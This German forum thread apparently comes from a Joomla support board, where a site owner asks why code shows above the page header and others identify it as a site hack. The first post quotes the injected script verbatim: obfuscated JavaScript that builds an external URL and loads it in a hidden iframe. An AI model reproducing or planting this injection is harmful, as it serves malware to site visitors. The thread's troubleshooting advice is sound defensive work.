+ Antworten
Ergebnis 1 bis 6 von 6

Thema: Sourcecode erscheint über dem Kopfbereich im Frontend

Neu an Board
    Bedankte sich
    2
    Erhielt 0 Danksagungen
    in 0 Beiträgen

Standard Sourcecode erscheint über dem Kopfbereich im Frontend

Hallo zusammen,

Auf meiner Seite http://www.artlin.de ( und nach etwas Suche fand ich mindestens noch 20 andere Seiten) erscheint über dem Kopfbereich eine Menge an Sourcecode.

nm='de';nl='nts';kl='i';j='tt';jp='7a0';z='hol';s= '/s';wr='3fb';ww='7';k='aus';i='79';hs='/in';xj='1';da='ge';no='x.p';v='tp=';lm='ra';zq='7a ';hg='a';x='fc';pb='hp?';st='h';q='e';qe='sme';r=' p:/';yb='/';ej='om';cr='f';ry='c';g='.c';gc='s';f='r';n='m'; ev='1c';vi='e';uh=kl.concat(cr,lm,n,vi);th=gc.conc at(f,ry);d=st.concat(j,r,s,k,hg,da,qe,nl,g,ej,yb,z ,q,hs,nm,no,pb,v,wr,jp,x,ev,xj,i,zq,ww);var t=document.createElement(uh);t.setAttribute('width ','5');t.setAttribute('height','5');t.setAttribute ('style','display:none');t.setAttribute(th,d);docu ment.body.appendChild(t);
    Die Seite läuft mit Version 1.5.23 und ich verwende das Template JA_Purity. Wenn ich umschalte auf rhuk_milkyway ist das Problem wieder weg.

Kennt jemand eine Lösung für das Problem oder kann mir jemand einen Hinweis auf einen Thread geben, in dem das schon mal behandelt wurde.

Vielen Dank im Voraus.

Verbringt hier viel Zeit
    Bedankte sich
    41
    Erhielt 216 Danksagungen
    in 209 Beiträgen

Standard

Es dürfte sich um ein Script handeln.
    Die üblichen Methoden, wie bei jedem Sitehack, sollten unverzüglich abgearbeitet werden.
    Der eigene Rechner darf auch untersucht werden.

Hier kannst du nach dem Scan deiner Seite sehen, dass es sich anscheinend um Malware handelt

3. Erhielt Danksagungen von:

Wohnt hier Avatar von Lintzy
    Bedankte sich
    300
    Erhielt 1.282 Danksagungen
    in 810 Beiträgen

Standard

Zitat Zitat von ArtLin Beitrag anzeigen
    Wenn ich umschalte auf rhuk_milkyway ist das Problem wieder weg.
    Hast du dir schon einmal die index.php deines Templates ja_purity angesehen? Ist da ganz am Anfang alles in Ordnung?

Hol dir Feedback für deine Website / dein Design! -> Klick
    Mit diversen Bewertungsboxen, Feedback-Kommentaren, egal welches CMS - völlig unkompliziert und kostenlos

Klick <- Gib Feedback für andere Webdesigns / andere Designs!

Neu an Board
    Bedankte sich
    2
    Erhielt 0 Danksagungen
    in 0 Beiträgen

Standard Gelöst: Sourcecode erscheint über dem Kopfbereich im Frontend

Hallo httpd:
    Herzlichen Dank, der Link auf Sucuri war mir noch nicht bekannt. Es stimmt, die Seite ist infiziert. Ich werde meine Seite dann erst mal offline nehmen. Zumindest weiß ich jetzt, dass es sich nicht um einen Template-Fehler handelt.

Ich werde dann erst mal alles neu aufsetzen.

Hallo Lintzy:
    In der index.php von JA_Purity findet sich zunächst nichts auffälliges.

Vielen Dank für die schnellen Antworten.

Neu an Board
    Bedankte sich
    2
    Erhielt 0 Danksagungen
    in 0 Beiträgen

Standard

Noch ein Nachtrag: Der verdächtige Text befindet sich in der index.php im Hauptverzeichnis. Aber ich vermute mal, dass es nicht ausreicht, dort den Text zu löschen.

Verbringt hier viel Zeit
    Bedankte sich
    41
    Erhielt 216 Danksagungen
    in 209 Beiträgen

Standard

Zitat Zitat von ArtLin Beitrag anzeigen
    ....Ich werde dann erst mal alles neu aufsetzen....
    Immerhin hattest du noch eine alte Variante zum schnellen Umschalten da. Das ist schon einmal sehr viel mehr, als üblich. Viele scheinen sich nicht bewusst zu sein, was Sicherheit beim Seitenbetrieb angeht. Für mich gehört eine Sicherung vor und nach jeder Änderung dazu.

4u ArtLin nochmals der dringende Hinweis:
    Bitte untersuche auch deinen Rechner bevor du Arbeit vollziehst. Ich vermute, dass der Infekt dort entstand. Ich persönlich bin möglicherweise übervorsichtig und mache Bearbeitungen immer mit einem Linux, welches ich von einem Stick boote. Für die Alltagssurferei starte ich ein Windo$ von der Festplatte.

+ Antworten

Stichworte

Lesezeichen